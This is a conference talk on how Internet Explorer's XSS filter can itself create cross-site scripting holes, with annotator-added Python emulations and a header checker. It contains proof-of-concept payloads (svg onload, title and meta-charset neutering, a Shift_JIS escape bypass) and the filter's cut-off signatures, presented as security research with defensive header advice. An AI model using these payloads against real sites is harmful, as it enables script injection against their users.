XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015

Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.

1. X-XSS-Nightmare: 1; mode=attack
   XSS Attacks Exploiting XSS Filter (Prudence Edition)
   Masato Kinugawa
2. Self-Introduction: Masato Kinugawa
5. Self-Introduction: Bug-hunter's Joy
6. Today's topics: ❶ XSS technique ❷ Bypass XSS filter technique, using IE's XSS filter
7. Sorry! I changed today's topics!
8. Today's topics: What is the XSS filter? How should we live with the XSS filter?
9. XSS Filter: Chrome and Safari have the same function. ➡ This time I pick up IE's filter. It was introduced in IE8 (2009).
10. Basics of IE's XSS filter, before cut-off:
    http://example.com/?q=<img+src=x+onerror=alert(1)>
    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    </head>
    <body>
    q param is: <img src=x onerror=alert(1)>
    </body>
    </html>
    If the request and the response both match a dangerous condition, the XSS filter rewrites the page.
11. Like this, after cut-off:
    http://example.com/?q=<img+src=x+onerror=alert(1)>
    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    </head>
    <body>
    q param is: <img src=x #nerror=alert(1)>
    </body>
    </html>
12. Inaccuracy of the XSS filter: when the condition matches, the filter rewrites a string that has nothing to do with the place where user input is inserted. Here the request carries `<meta+charset=`, and the filter neuters the page's own static tag:
    http://example.com/?q=AAA&<meta+charset=
    <!DOCTYPE html>
    <html>
    <head>
    <m#ta charset="utf-8">
    </head>
    <body>
    q param is: AAA
    </body>
    </html>
13. The world after the XSS filter was introduced: every site suddenly had the possibility of a partial rewrite of its page. (2008 → 2009)
14. About a little change: is it no big deal? ➡ Let's think about changing 1 byte somewhere!
15. User input dynamically inserted inside a string literal:
    http://example.com/?q=AAA
    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    <title>TEST</title>
    </head>
    <body>
    <script>
    s="AAA".replace(/</g,'&lt;');
    document.write(s);
    </script>
    </body>
    </html>
16. XSS measures are OK: the server escapes the double quote with a backslash, so the literal does not close, and `</script"` is not an end tag because a quote follows the tag name:
    http://example.com/?q="/</script
    <script>
    s="\"/</script".replace(/</g,'&lt;');
    document.write(s);
    </script>
17–25. http://example.com/?q=<svg/onload=alert(1)>: the literal is `"<svg/onload=alert(1)>"`, replace() turns `<` into `&lt;`, and document.write emits `&lt;svg/onload=alert(1)>`, harmless text.
    <script>
    s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
    document.write(s);
    </script>
26–28. Same request, but now the filter matches and rewrites the page's own `<script>` to `<scr#pt>`. The script never runs, and the string literal is parsed as ordinary HTML, so `<svg/onload=alert(1)>` becomes an element with an event handler.
    <scr#pt>
    s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
    document.write(s);
    </script>
29–36. Or the filter rewrites the escaping regex `/</g` to `/#/g`. `<` is no longer escaped, and document.write emits `<svg/onload=alert(1)>`, which executes.
    <script>
    s="<svg/onload=alert(1)>".replace(/#/g,'&lt;');
    document.write(s);
    </script>
37–41. http://example.com/?q=</title><svg/onload=alert(1)>: the filter rewrites the page's `</title>` to `</ti#le>`. The title element now runs on until the attacker's `</title>` inside the script text; everything after it, including `<svg/onload=alert(1)>`, is parsed as markup and executes.
    <title>TEST</ti#le>
    </head>
    <body>
    <script>
    s="</title><svg/onload=alert(1)>".replace(/</g,'&lt;');
    document.write(s);
    </script>
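The three outcomes on slides 26 to 41 can be reproduced offline with a small model. The following Python is an added example, not the speaker's code: it reconstructs the slide-15 page (assuming the server escapes backslash and double quote, which is what keeps slide 16's payload harmless), models the filter's cut-off as overwriting one character of a matched string with `#`, and runs a minimal HTML tokenizer that honours the raw-text rule for script and the RCDATA rule for title. It does not know the real filter's signatures; the neutered positions are taken from what the slides display.

```python
import re

# Reconstruction of the slide-15 page (assumed server-side escaping of \ and ").
PAGE_TEMPLATE = """<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="{q}".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
"""

def render(q):
    """Server: reflect q into the JS string literal, escaping \\ and \"."""
    escaped = q.replace("\\", "\\\\").replace('"', '\\"')
    return PAGE_TEMPLATE.replace("{q}", escaped)

def neuter(page, signature, index):
    """Model of the filter's cut-off: overwrite one character (at `index`
    within the first match of `signature`) with '#'. Which character the
    real filter picks is undocumented; the indexes used below reproduce
    what the slides show (<scr#pt>, /#/g, </ti#le>)."""
    m = re.search(signature, page)
    if not m:
        return page
    pos = m.start() + index
    return page[:pos] + "#" + page[pos + 1:]

RAWTEXT = {"script", "style"}    # '<' never opens a tag until the end tag
RCDATA = {"title", "textarea"}   # same rule for our purposes
START_TAG = re.compile(r"<([A-Za-z][^\s/>]*)([^>]*)>")

def tokenize(html):
    """Minimal HTML tokenizer: returns (start_tags, script_bodies).
    Inside script/style/title/textarea the content runs to a real end tag,
    '</name' followed by whitespace, '/' or '>' (so '</script"' on slide 16
    does not end the script element)."""
    tags, scripts, i = [], [], 0
    while (m := START_TAG.search(html, i)):
        name = m.group(1).lower()
        tags.append((name, m.group(2)))
        i = m.end()
        if name in RAWTEXT | RCDATA:
            end_re = re.compile(r"</" + re.escape(name) + r"(?=[\s/>])[^>]*>", re.I)
            end = end_re.search(html, i)
            stop = end.start() if end else len(html)
            if name == "script":
                scripts.append(html[i:stop])
            i = end.end() if end else len(html)
    return tags, scripts

# The only script shape on the page: s="<literal>".replace(/<c>/g,'&lt;'); document.write(s);
WRITE_STMT = re.compile(
    r"""^\s*s="((?:[^"\\]|\\.)*)"\.replace\(/(.)/g,'&lt;'\);\s*document\.write\(s\);\s*$""")

def emulate_script(body):
    """Return the markup document.write would emit ('' if the shape differs)."""
    m = WRITE_STMT.match(body)
    if not m:
        return ""
    literal = re.sub(r"\\(.)", r"\1", m.group(1))   # undo \" and \\
    return literal.replace(m.group(2), "&lt;")      # the /c/g replacement

def handler_injected(page):
    """True if a start tag carrying an on* attribute reaches the HTML parser,
    either directly from the response or through the emulated document.write."""
    tags, scripts = tokenize(page)
    for body in scripts:
        tags += tokenize(emulate_script(body))[0]
    return any(re.search(r"\bon\w+\s*=", attrs) for _, attrs in tags)

PAYLOAD = "<svg/onload=alert(1)>"

def outcomes():
    """The intact page versus the three one-character rewrites the slides show."""
    intact = render(PAYLOAD)
    return {
        "intact": handler_injected(intact),
        "<scr#pt>": handler_injected(neuter(intact, r"<script>", 4)),  # slide 26
        "/#/g": handler_injected(neuter(intact, r"/</g", 1)),           # slide 29
        "</ti#le>": handler_injected(                                   # slide 38
            neuter(render("</title>" + PAYLOAD), r"</title>", 4)),
    }

if __name__ == "__main__":
    for case, xss in outcomes().items():
        print(f"{case:10} -> {'XSS' if xss else 'safe'}")
```

The intact page stays safe; each single-character rewrite yields an executing `onload`. The `</ti#le>` case is the one an HTML-unaware check misses: the response still contains a well-formed `<script>` block, but the browser is in RCDATA mode when it reaches it.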
42. http://example.com/?q=%E3%81%95";alert(1)//: the server escapes the quote, so under UTF-8 the literal is `"さ\";alert(1)//"` and nothing breaks out of it.
    <meta charset="utf-8">
    <title>TEST</title>
    </head>
    <body>
    <script>
    s="さ\";alert(1)//".replace(/</g,'&lt;');
    document.write(s);
    </script>
43. The filter rewrites `<meta charset="utf-8">` to `<m#ta charset="utf-8">`. The page now declares no charset at all.
44. Interpretation as UTF-8: "さ\";alert(1)//"
    bytes:     0xE3 0x81 0x95 0x5C
    UTF-8:     さ (E3 81 95)   \ (5C)
    Shift_JIS: 縺 (E3 81)   表 (95 5C)
45. Interpretation as Shift_JIS: "縺表";alert(1)//"
    The 0x5C backslash that escaped the quote is swallowed as the second byte of 表, so the quote now closes the literal and `;alert(1)//` is code.
46–47. With the charset declaration gone, the browser's fallback encoding decides; on the slide it is Shift_JIS, and alert(1) runs:
    <m#ta charset="utf-8">
    <title>TEST</title>
    </head>
    <body>
    <script>
    s="縺表";alert(1)//".replace(/</g,'&lt;');
    document.write(s);
    </script>
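The byte-level part of slides 42 to 47, as an added example (not from the talk): the reflected literal is decoded once as UTF-8 and once as Shift_JIS, and a small scanner applying JavaScript string-literal rules reports what ends up outside the literal. The byte string is constructed from the values on slide 44; Python's built-in codecs do the decoding.

```python
# Constructed from slide 44: E3 81 95 = さ in UTF-8, 5C = the backslash the
# server added in front of the attacker's quote, then ;alert(1)// and the
# page's own closing quote.
REFLECTED = b'\xe3\x81\x95\x5c";alert(1)//"'

def decode_as(charset):
    """What the browser sees once it has settled on `charset`."""
    return REFLECTED.decode(charset)

def code_outside_literal(text):
    """Scan a JS string literal whose opening quote has already been consumed.
    A backslash escapes the next character; the first unescaped '"' closes the
    literal. Returns what follows the literal, i.e. what the engine executes as
    code ('' when nothing breaks out, None for an unterminated literal)."""
    i = 0
    while i < len(text):
        c = text[i]
        if c == "\\":
            i += 2          # escape sequence: skip the escaped character
            continue
        if c == '"':
            return text[i + 1:]
        i += 1
    return None

def breakout(charset):
    """Code that escapes the literal when the page is decoded as `charset`."""
    return code_outside_literal(decode_as(charset))

if __name__ == "__main__":
    for cs in ("utf-8", "shift_jis"):
        print(f"{cs:9} {decode_as(cs)!r:32} -> executes: {breakout(cs)!r}")
```

Under UTF-8 the scanner reaches the page's closing quote with nothing left over; under Shift_JIS the two-byte 表 consumes the 0x5C and `;alert(1)//"` is left as executable code. The page on the slide depends on one byte of `<meta>` markup for its encoding; sending the charset in the `Content-Type` response header as well removes that single point of failure, because the header takes precedence over the meta declaration.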
48. Basically, even a 1-byte change is a risk. In the past, when you were not careful, the XSS filter's rewrite itself also became a vulnerability: "Universal XSS via IE8's XSS Filters", Eduardo Vela Nava & David Lindsay, Black Hat EU 2010, https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
49. 2015: is it safe now? Let's see how far the real cut-off rules go! I found XSS-vulnerable patterns in pages of ordinary structure that have no XSS of their own. Is it safe… no, it isn't! Apart from this one, that case will be published after it is fixed.
50. Cut-off rules: they are not documented in particular. We can see the regular expressions for the cut-off strings in the DLL that the browser loads.
51. Cut-off signatures, before cut-off:
    <button value=   <form>   <textarea>   <isindex>   <input value=   <option value=
    <embed src=   <embed type=   <iframe src=   <frame src=   <x:vmlframe src=   <link href=
    <import implementation=   <meta http-equiv=   <meta charset=   <a href
    <script src=   <script xlink:href=   <script href=   <script>   <applet>
    <object type=   <object codetype=   <object classid=   <object code=   <object data=
    <base href=   <style>@i   <style>:(   <style>:   <style>=(   <style>=
54. After cut-off:
    <button va#ue=   <fo#m>   <texta#ea>   <is#ndex>   <input va#ue=   <option va#ue=
    <em#ed src=   <em#ed type=   <if#ame src=   <f#ame src=   <x:vmlf#ame src=   <li#k href=
    <im#ort implementation=   <m#ta http-equiv=   <m#ta charset=   <a hr#f
    <script src=   <script xlink:href=   <script href=   <script>   <ap#let>
    <ob#ect type=   <ob#ect codetype=   <ob#ect classid=   <ob#ect code=   <ob#ect data=
    <ba#e href=   <style>@i   <style>:(   <style>:   <style>=(   <style>=
56. Demo page (the `<scr#pt>` case from slide 26):
    http://example.com/?q=<svg/onload=alert(1)>
    <scr#pt>
    s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
    document.write(s);
    </script>
57. DEMO ❶ <a hr#f ❷ <m#ta charset= ❸ <li#k href= ❹ <script>
58. I want you to feel it: the safety of your site depends on the XSS filter. ➡ Is this a browser bug? Should the browser do something about it? I cannot say that rewriting a page is always safe.
59. In the first place: can you declare that your site can stand up to a partial breakdown of its page?
60. The XSS filter can do this: the XSS filter "very carefully" rewrites a page. #
61. In fact, in some cases it is possible to disable a specific function through an intentional false positive. (…) Did the authors of the XSS filter introduce it while recognizing these risks (or not)? I am a little interested in that. (Mr. Terada's blog, http://d.hatena.ne.jp/teracc/20090622) Mr. Terada and Mr. Hasegawa's exchange from six years ago, below: the browser side introduced it knowing the risk.
62. In fact: http://b.hatena.ne.jp/entry/14131603/comment/hasegawayosuke. An insider (Mr. Hasegawa) said: "The answer is Yes." The browser side introduced it knowing the risk. ➡ Do web developers use it while taking care of the risk?
63. What is "taking care of the risk"? Then you should do as follows:
    ✔ completely grasp the XSS filter's cut-off behaviour.
    ✔ if part of the page is rewritten, inspect the whole page for normal operation and safety.
    ✔ if the page includes a dangerous part, rewrite the code piece by piece to avoid it.
    Can you do those?
64. Example of cut-off strings: javascript:1   vbscript:1   vbs:1
65. After cut-off: javasc#ipt:1   v#script:1   v#s:1   Is this simple?
66–67. Detail of the cut-off for javascript: (the regular expression as it appears in the DLL; see http://masatokinugawa.l0.cm/2012/09/xss3.html)
    {(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&[#()[].]x?0*((83)|(53)|(115)|(73));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&[#()[].]x?0*((67)|(43)|(99)|(63));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()[].]x?0*((82)|(52)|(114)|(72));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&[#()[].]x?0*((73)|(49)|(105)|(69));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()[].]x?0*((80)|(50)|(112)|(70));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&[#()[].]x?0*((84)|(54)|(116)|(74));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).}
68. If you can do those:
    ✔ completely grasp the XSS filter's cut-off behaviour.
    ✔ if part of the page is rewritten, inspect the whole page for normal operation and safety.
    ✔ if the page includes a dangerous part, rewrite the code piece by piece to avoid it.
    then I think you can fix all the XSS on your site anyway... ➡ So what is the best option?
69. X-XSS-Protection: the response header that controls the XSS filter.
    Value          Effect
    0              Disable
    1              Enable (partial rewrite) [default]
    1;mode=block   Enable (prevent rendering of the page)
70. How are careful people doing it?
71. HTTP/2.0 200 OK
    Date: Mon, 19 Oct 2015 22:32:06 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Encoding: gzip
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN
    ...
72. HTTP/1.1 200 OK
    Content-Encoding: gzip
    Content-Type: text/html
    Date: Mon, 19 Oct 2015 22:40:37 GMT
    x-content-type-options: nosniff
    X-Frame-Options: DENY
    X-XSS-Protection: 0
    ...
73. They are deliberately controlling it!!
74. The choice that considers more safety:
    Value          Sites which should choose it
    0              Sites that already take basic XSS measures / want to avoid false positives
    1              Not recommended (the technique shown here applies)
    1;mode=block   Sites that may well have XSS / want protection just in case
    (default)      Do not leave it: use X-XSS-Protection: 0 or 1;mode=block
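An added header check for the table above (my code, not the speaker's): parse a raw response head and classify its X-XSS-Protection value the way slide 74 does. The first two response heads are the visible lines from slides 71 and 72 (the slides cut them off with "..."); the third is constructed to show the default case.

```python
# Response heads as shown on slides 71 and 72 (truncated there with "...")
SLIDE_71 = """HTTP/2.0 200 OK
Date: Mon, 19 Oct 2015 22:32:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
"""

SLIDE_72 = """HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 19 Oct 2015 22:40:37 GMT
x-content-type-options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
"""

# Constructed: a site that never set the header, so the browser default applies
NO_HEADER = """HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
"""

def parse_headers(raw):
    """Status line + header lines -> dict keyed by lower-cased header name.
    The last occurrence of a name wins; header folding is not handled."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

def xss_filter_mode(headers):
    """Classify per slide 69: '0' -> 'disabled'; '1; mode=block' -> 'block';
    '1' or no header -> 'partial-rewrite' (the browser default)."""
    value = headers.get("x-xss-protection")
    if value is None:
        return "partial-rewrite"
    tokens = [t.strip().lower() for t in value.split(";")]
    if tokens[0] == "0":
        return "disabled"
    if tokens[0] == "1" and "mode=block" in tokens[1:]:
        return "block"
    return "partial-rewrite"

def audit(raw):
    """Return (mode, acceptable). Per slide 74 only '0' and '1; mode=block'
    are acceptable; the default partial rewrite is the behaviour the talk attacks."""
    mode = xss_filter_mode(parse_headers(raw))
    return mode, mode in ("disabled", "block")

if __name__ == "__main__":
    for name, raw in (("slide 71", SLIDE_71), ("slide 72", SLIDE_72), ("no header", NO_HEADER)):
        print(name, audit(raw))
```

Both sites from the slides pass; the constructed response without the header is the case the talk is about, and so is an explicit `X-XSS-Protection: 1`, which only restates the default.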
75. Is mode=block safe? It should not lead to direct script execution. I think the benefit of the filter is bigger than that. If the cut-off behaviour can be detected from outside, someone may guess the page's contents. This possibility probably can't be reduced to zero. On the other hand…
76. Comments from web developers.
    Me: How about changing to 1;mode=block?
77. Me: How about changing to 1;mode=block?
    Dev: The cut-off explanation is unkind, and user support is difficult when there are false positives…
78. Me: The cut-off explanation is unkind. Sure…
79. Me: I think this site takes basic XSS measures; would you like to use X-XSS-Protection: 0?
80. Me: I think this site takes basic XSS measures; would you like to use X-XSS-Protection: 0?
    Dev: Users may think we put product behaviour ahead of a security function, even an imperfect one.
81. Trap of the XSS filter: cutting off only the attacked position and showing the rest of the page looks like the smartest option of the three (0 / 1 / block). That very behaviour is the risk.
82. Conclusions: I'm hoping for improvement of the XSS filter. It should still be possible to do it safely. Is the present default behaviour really OK? In theory, the cut-off risk is inseparable from the XSS filter. I want web developers to know about this possibility. I highly recommend controlling the XSS protection header rather than leaving the default behaviour.
83. http://l0.cm/xxn/ (lower-case L and zero): the real nightmare will be published at this URL.
84. ";alert#"Thanks!"#// @kinugawamasato masatokinugawa@gmail#com
